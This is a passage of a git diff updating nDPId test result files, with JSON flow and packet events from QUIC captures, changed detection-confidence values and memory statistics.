02277{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639054047280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1639054047280,"pkt":"AAAAAAAAAAMAKVHRCABFAAVifypAAD8RWHqGNSQrjmgmHohlAbsFTlBUwQAAAAEIajnnvXpZQGkAQKS1+N8fvEy\/IOkT4oydortAv2EA7pMR1b57qEUN\/CWLgwIsiaJrsQ4hFHO3l4u7VGBrkULKHI\/lxjDWdE1irA7d2B7h4jkYKWy0HD2ljAAwNUaCq2GQKYIMFYPPnjUgnc6NRkaRBhSzAe8fZndm3nU75Z7WMus4y4FiuskzWK7wPKBIM7bxQiBvpY62McQkd0tyvv46Jp9sqnschBDc67JbIa9bgESPp+gcP9R53I2XHVB+sKt85pW8jfCDOYD2MzyGLQ+T55Kb3elNggevRPNt5\/n5LSD1+BaMwPIWniyhyXqn9M7ZOvHxtplESf3\/ummwgMYCFjWE4x4CgV+8lqttLnKDT+33uPLxFmhUHvuyRgYs53v+N7Yn38UufUU6ZhOXmHE8+XWeHs3tu8WDodE6SWRhM5xseVzCZYLGTT3X6CjYNFcJl6kyqmquwogEu3CCHnXmS\/INjB4uSUiyMhRi4SumS20xZFVtqZZynkmMlWnK09e81BgkY\/iuisZWvJRuJHFdwM30B5LDjtpgqfazbpCu6Uwmv2u3GL8UYFg9JXJ6XKW7RjDXv2OXecpNpV7Ec+NZ7S+Eblk+2y7gdGGGOJ0YWQ\/UdbM9tjr75mYZlmZ2XmwaOWA7lupjotCEVtvNyVGjw1p0RQjwWwkUNuy\/TjEqMcudShKNa9WCDQ8bWEIgXHDXASO\/PVPq3gEIqJWQbO0nhO2rHJC9mtpB902MTnQB3oRhiTtUMf7fAmQ+6s5GNn6c3en3gGYGA+JPXusJvDjsRu3PwCbxmWJ5W42P6X61ctfR4ImfNUcG5Su4UNFa8ImA7GgSH608jeNlAEH+oOj8LjAiKc4rTEvo1LMxkcm0RbEgQ5zCg4gb3K695U7hnkuVkbZ2P0\/0RHqSidtcHdfWB8hEkFLyKuUlyFbgTj26IexnKPiu\/sik7Xf0GfC\/8RFWHPg46bSbOrQPg\/gjKdjoVYkal7TJgFaID+VHNzeQm+hSPwwtg2AWznQWRmFkp75yYX7gosdtClYrZYA6FFirHqDW+0GJykjlxQKOXDmUJPLnyG1hF2irp+YW2l8A4zScFSFMH7ORiz7jakW38s4r3LjbMiRb8Tx+m08\/My\/lJnC9xZh8q82LXT41dv64cfwg2eQtvH2Lqzs2I9rgcYmsyHnPyvR7699rVEk9J9YaLrjr+fk8N7MwS+A2tX9iODZWnJOUm+mTNwC\/T\/RWyAERM4hbUAEurepo8J\/aEcXnBHo7os5GSVLmj\/GiHweHArDF0myFhpn34cAp8f6Y0QM3kFU6FLExLGABdnyQk5FEBOr15qkQbVxZ3kiwHa5MCacTRiiIRbM6fJjJYMCKTLqYyerVtahDJjc9THoEHqkc263xcjlUk3B+44Z4xuqgt4XeHolWU+aZMt8oRurkAG4Tuf4UKqTmIxukJT2TMBWkasVQHP3Z8Wausgp7GWEQU567iGHAcPK670SSe9B9hqsJ8oOEYcON5apMj26RB8Zd26Q8fiq1vqWEGo1PCxuUi5unaVFgNv+c1hkvn7meyjHS\/L5Rc3CDUEpgtYy1aOHQJRbXUKAeBVqgmzVlTFgKNAdhCllApJowozwlhoVXS7RvypYWLyqEFM7Zu4iCwMajFBhTXBCFwHLDlfiSC1hs3iPlIAICRuCzOLoHacQfJq+YMBKP9Z\/B3dU8jrKoUx8rHfRizok1fJto91R9llaEwHYg05bSKiD9k+j1zXsQMK8reMddzvzIMatcM2wofN5hnpTHOrEb+bb8zNLy1vI98DbE"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054047280,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"app-analytics-v2.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"1b4b6c50fef204e06798d3fc7cb272fe","tls_supported_versions":"TLSv1.3"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054047280,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"app-analytics-v2.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"1b4b6c50fef204e06798d3fc7cb272fe","tls_supported_versions":"TLSv1.3"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02285{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639054232898,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1639054232898,"pkt":"AAAAAAAAAAUAQ0IQCABFAAViVFVAAD8RpeL1oYaxTfJyDmv0AbsFTuofyQAAAAEIVDeTZ9G0fVcAQJ7tD+1f\/+cIs8rTOAJmB9XT+G6akE0bRSYPWlYxlwYQgKRHpPG8lylyHgIaQZ8sJXtKvXdfLWTgSTNd5aRIZtuvjsWGM2q1ChFxTDrq0gh9Mn3XrTBNGLcE\/KOXhBozAtSeZE6MWbRy5IOveCHAiESH1gtNyBv5LBZlj0NMnb2mwSGz3VEF\/uR9XKBDieR+s2tHY1DI52IyGT49Jsx+HESVOfkRSHj1714zjgsyidrvJr51XV\/iMlIIyh8C9eJOXAxFYq+H92kbHkpiREhgpx9V1pLYn02OQvsP5v6Ve8k91xQWteYlQ01o5rSdr40zwXusZGqachnXgXv8vszMRWLA9PLhOI7kOFFDZXcImD8JH5oSxZp5OovqcpoP\/NL0u7PTs2VBLlaF4HoB8x3834lHBmqnFiaVaDFwllLdbz80hqVNmVXpLgB6zB7H02Zk8y1YEnDUvjjsryRUoD\/2uXxaZ0y6dKxzxEDLAdYZLpyefpJQtFMTgT8ocY8Ud+uXKAj9s6m86UDfYUAWlFBJTNv5aeSrzpbaJy8BSLNbxUX14bMcUVrlZa6wvN6KSurVgSJLDi6uRcgpmjWx2Czjz4Z6ygzz6o50UnO3ZNyRnpD0q\/ArniO1mAFuRD8EPWjOQUVIMCFPEjh53eHS6\/oL4FopXCeW3nB8wsfVNzPBv38jmCItrDwi+mGkv6DSWyV+hgXozgwQQ5ejej2maJyF5p5n8LHVV1dEozQcIkFg1jdl11dhdr2YO+cuV9Mzhj9o+bt2Q9zCCfUuQW6bWzMhtGBruaW+trc9bGpZaCKLWinH1VFyH+j0IW6ex1lwpPGickf7IwOfBrCcjRNe9iom9A4AcKomuJD\/3xy56gpwP2whItWhilZu6bnjDW5kcsO\/6LYffu\/gGdurBeVYPsCismGAquBr\/\/sZeURzPCdSTbXciLqrL5bPr0q1GQJFjSFyN79i4bYN0MZZM\/l+RRVat88Aix7e0FL2q\/ldGUkTNonfTMqXRowtJHWSE2F4Hx9sR4mj79bpdjkJ7aPSyTzbpJXvk5hfZhwAxh8b1nGa6UagwcKkChgrDRs+aJj6u5uFs8PDQg\/ZKToy5AjNrFDPEtRRnxuM1zqNb38rtVLTTVgJgQaL0vmq9NaYENXz1aWL+guidN40XBTJrsgxD3EhGUJ+DSi59\/dOKWe2Rl1sISbY6h6MeGh+g\/i+zVTF6y50uxcyWWl1Dmxs2rXt9fj2zARugrEJVmUSW4JJVCY7wL2NY2QeDAAHL20F5xC\/x77hQYZQNgtcjoJAyCSBciIQVQRxhiuZ5p+aFbDuGE6wYLZxwdYvXXM+zUgQ++nEFyfsakRNAZGOL\/2DUBiORi\/tb+bUY3Uks3Z6CiZKZwhEx+G25f\/DF3zus8LeXpgfhonGIiwLpOhSXMO7Sfb2vEzRxXsws0LikyNbDs7giA235fQ4KYtxHcQJYl6jv0pP6jHZr6rzP9zAaWGaPC\/04kDGUig8XFlj43r4bRqomRURoYx\/xcc+mR8kpRFblBJYEvDW2cG25EuhyCidLR\/MEaMJV1aEkmvYk23KqqVsDEwUJTlePtENboY9yvL36SluUuKTLjCv6BAqIcvYU8JUNe5kKy6Y0VoQy45HxGro9pv\/+agix0J+X\/8ZPIoarFDvNd9r9w04Tg40psUeLWizK+dT27jGcmuDPDDVQWmp6QqrzpFKExSzHYja8c4K2jY\/JiwtluOmCp+ttKuD\/hxw1myZNXg94Jx3Iiq7JwfwMXbH2UidKQX\/tu2J"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"gcp.api.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"c570fdf41c8bf336ac9442888680bf3a","tls_supported_versions":"TLSv1.3"}} -00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"gcp.api.snapchat.com","version":"TLSv1.3","alpn":"h3","ja3":"c570fdf41c8bf336ac9442888680bf3a","tls_supported_versions":"TLSv1.3"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054047280,"flow_last_seen":1639054047280,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"134.53.36.43","dst_ip":"142.104.38.30","src_port":34917,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1639054232898,"flow_last_seen":1639054232898,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1639054232898,"l3_proto":"ip4","src_ip":"245.161.134.177","dst_ip":"77.242.114.14","src_port":27636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Snapchat","breed":"Fun","category":"SocialNetwork"}} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_crypto_aes_auth_size.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":2700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1639054232898} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5895501 bytes -~~ total memory freed........: 5895501 bytes -~~ total allocations/frees...: 118164/118164 +~~ total memory allocated....: 6029135 bytes +~~ total memory freed........: 6029135 bytes +~~ total allocations/frees...: 120926/120926 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 481 chars ~~ json string max len.......: 2290 chars diff --git a/test/results/quic_frags_ch_in_multiple_packets.pcapng.out b/test/results/quic_frags_ch_in_multiple_packets.pcapng.out index a2b790b1b..f2547aa5d 100644 --- a/test/results/quic_frags_ch_in_multiple_packets.pcapng.out +++ b/test/results/quic_frags_ch_in_multiple_packets.pcapng.out @@ -2,11 +2,11 @@ 00575{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1616775370814} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1616775370814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1616775370814,"pkt":"AAAAAAAAAAAAAAAAht1gIK6gBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB5cYRWwTYBOvDAAAAAQjg6gfRBF\/f3whbtLKZy53KxABEtrnM4d\/0kI3t2T5FO3RTETvA3HGhmrbwnQma+SPYPn8iYYuHdKaQW8SovX0+V4dnPseYO+4VTSZldeifgT8VNQQB04ta3cEyZMDpKRtegW4dekko5HPUbEiidNmSQOuP3pH\/8SoL9x7tTBQzg2OL3UpCqjAnX16pFAdQ+V\/RbqJ1eyzWFdbwBQd2HuCx\/Ij151BRRI2Xn\/z+ADB4rVF4WDOutzm10O8sh2ssLFe2YyMKEeSFhkO2WxMcAatNA2lQ4qJXI32K2kygG4WC7Q8Bb0hTFMG\/mywEn7y4151OST4nZUDKvDlYcVWjuF+qTVspa\/iH7c2UuyPhpTYvIjH0QeZUxZzZhSTFej2LWwFlP2YFzpGwiJSwBaiLMY+5\/70DioAlmqyVC7SFNLAm4+7fUc\/CJsf0f8FDbPGjMEF4r4f5+0LVZH94Uy4Wd0tsSsAOmIxjxwMYhgLVVmrVt7TBRxZotLsMMAE5KgY4C37J7AKCvvh04vXJj1z3UQVYGJh48Z9j2DH62a8\/DQXS74cUeasgoXI\/\/fcqyqG\/+dEnkEyyQl9f50ViwTzUzqhBwr01HZapB8dBBIdSdOLcU\/xu7325B4gE6MbrZr6w6DY7ChrOgc2VWwoxehsZo41rWBZsOQNIyPzLv9J0BRip+w7GJmYxc+3ube6gxdaz9W+Sn43CsbRIQrhbCgHGaXLfLG33YcaU4X+6lhZpZDIRrpfHlieNk0E4HHfvmW6nTXkwcpHKUc\/LWt5+WouHWvxMn4x+ldQDvX1+1587CV3XMwwBZM2RazatEhHW1RJ3OT+xC3gie6tmmnMQduXseFmc+V2JaT5\/q6MRU\/TlwY0Rq7EtJ8+ZbzGXqIuu4jxCx9oMmi66z65uXw3qINNOeUxHXJycpAWw5De4VzaVR4lwygzKGqlnx4L3JUveIj+oObyh7F56NqTe5C4UVw0rXOK5vqDKafrSODvkieITTgx03B2pUNKW9RLu1PhtbXUZuY0giPngPfKgjMEWwbgah5IvyTnveaL6sEqf9jfr3kFrsy+GNW\/OyorkDnRpI8RofzGw1tLxiDlPgh1n9rHyR1pRdby9Bnf\/rDHEeTaxotP0WhApggHCHa\/yFJECzVqs9aS7i2yWDcJfS40AFynUP1UGKhJe\/uUxXih7qXtheQ7FXxIkAhVv3cPoCRA71Cfs2E\/Eey1fVKRW5lMJW9PriJc7GoWtyx70pOdZsK8HXiQEPiYKJaSioN0cr28BDrpMUfunJRWn8PiLmXUmTtuIMIbhFyGy+EQ6xhnD+A\/0hLJNWNHMXLu\/kfUBoupAJQTCcfsChogaeqgD6e5eSYCN5PT9+XpGN3+Gf4PxJfDsTjsRYy9pJctfaPC3hqhyOjQKfCx2rbpvgC9PMRVByJjtLJxGnkJUAuG3l6UFakUVvosZ+5M63lUcs39+r3quiDA5yu7NAJ8A\/i87lBxkG+y1mdyDXsaBDCfcK3ZxP\/soZcY4r+0QCaSKYxK3TnciTbuVT2emgJe6oE17JFaMKL\/+oNqA3ly+Sny53LHt3DnGVzfWQGnSJpT2w1xGiily9lTfAyLsd+fvmBtuH20lp8Prs7ZgVUIGMd\/pWSRV\/g=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 02181{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1616775370814,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1616775370814,"pkt":"AAAAAAAAAAAAAAAAht1gIK6gBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAB5cYRWwTYBOvIAAAAAQjg6gfRBF\/f3whbtLKZy53KxABEtnQ\/+pwGuyRXXtCPS4nq7SX6grDxLfue\/EWjBDnFsaHC\/vCyPJupYn95B94uIc35RQAXJzdsabL2pMXT5Sg\/JFun6HAUw7sNlvetq5pdG5oKE3vK\/9SDzJXTzgevEg9XCLK53vmKKNkAp8pIPL5uP852yCxWDuffTSDh3jvmocyuqPyR7wKy2amWQmRTLcjhYY1mtN\/AJ7QgugkmRPkVO\/SoOHb8vfwVTlN5QBI31Pgn0V++7rQ\/hjHjrgDqH59C7UvU4Nu\/9qoDxnTOmBoHcK94LPoI1\/y4+hexZ8e1eBwahcRgYxrP7dWTWrR+JwPD9iUpUFvxo8SIgmgVWi\/abM6MNwKmYTCNLXo60x4HtaN\/BCJP7I1SX\/LShf0cye1Of1imuBKSreuS8hR5\/tpYaSzuPld82ydSmvszAQ0GryqOJ\/ZU+jrxR3Tt\/AaRw5XB7LAQ5igi24rk0VHa8niUCDbHqUASsZJvejkDDbY6MmPqlfYaICmikKWML4UMFuk7sfDyY0i\/p8vLuvuadwwdvnNfiwmeiSJzrvtn4jKJUdczJeqQoEAINkoOw1bVBZDJVR+EUBqhm7abaUZnOPU0klsCmtzptRhvGdjGICwe3xiagqEEKgFQwB\/\/vebz12DECZEBQUukhbsCExHpl8HueAXvKSAyA62DZTnPjBbFDRoGUnmsN1w6rv\/EkKmT98KOnW\/ka23T8HpQyGW03QC+qJdzK2gggcKfOwsz6hd9z3KPjD06UASEHqfcZ0u3Yb5\/MLumpY8Low4YAuz4j1rPsR+y\/EQkWeHaYLF\/80wJp9yb7\/2p+rbsZa7D\/Pz9wdYYj0cnrXYhrg9HYHuPZ9wKDfGS5vYIihZYRGMbEMbGcFgLdOANlbTrqep7qeYaIu5bs42rtv9xGYAL49yzxTkJJj7obpk0WDg3hmOo0G0GKuMN5D3DLsd6CAekttgc\/RyQGGWPf1OdBrGOZ886sVlSYfVI53O8wLp1YwCY1QmFzdPpSevtizJ2XYvFJ+Yw3zir1qwBxD4bhntoDg+aEGwqIyiNyXgHCI13JOQpJXthbpRAj68Wk4NuVBdRmms6tJsRF69JML\/Y+B\/BUH3oVmSCNLicSWHjivNwSDG\/d7QepAS1wNYGwNmTzWQ\/PCj5j9Cdw66mm6RDZWarxDm\/oSk9NEMFrY7xKK7IeubvrPWd6WDDdJ9Bovp5NzhHiKuwVSSx\/d0e1A6bU1Fi5dfUEcrY4mCVrLQtrrzL\/UquhZSdn1pyiOy0MI0Y\/bnbB4K6J04rXZ6nEtp1EU\/NkSSyz++QGuwa8v++mBZgyRRdHXky\/yOSrTGxbmNikQP\/BXOaO3nlrxeU7SquOho6ofMGkAD9m9nnD04JBpXDbsymnBuGkTUgApPRp+NHNg+aAhwX0QXv21nT1GOJGkgZ\/kOk29raa5UerzxHP43\/ZNnwqcVGS2ek0xFdawyoi7pyvj0GVa4CngTmUuJHLHSgXXYFgoXLIzPy5xMdEYkZFlxKRT4P6vvGmfHBlL7ZZl80WmHAnvVLA4inP9N6NQ6gpEuafQMHiBC8RZ7r7p\/7NgSW8\/N+dUhCD7Bp0uOQmBUbYktydmi2FFhvERfbJQ=="} -01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"version":"TLSv1.3","alpn":"h3-34,hq-34,h3-33,hq-33,h3-32,hq-32,h3-31,hq-31,h3-29,hq-29,h3-30,hq-30,h3-28,hq-28,h3-27,hq-27,h3,hq-interop","ja3":"0299b052ace53a14c3a04aceb5efd247","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +01176{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"quic_frags_ch_in_multiple_packets.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1616775370814,"flow_last_seen":1616775370814,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1616775370814,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":58822,"dst_port":4443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 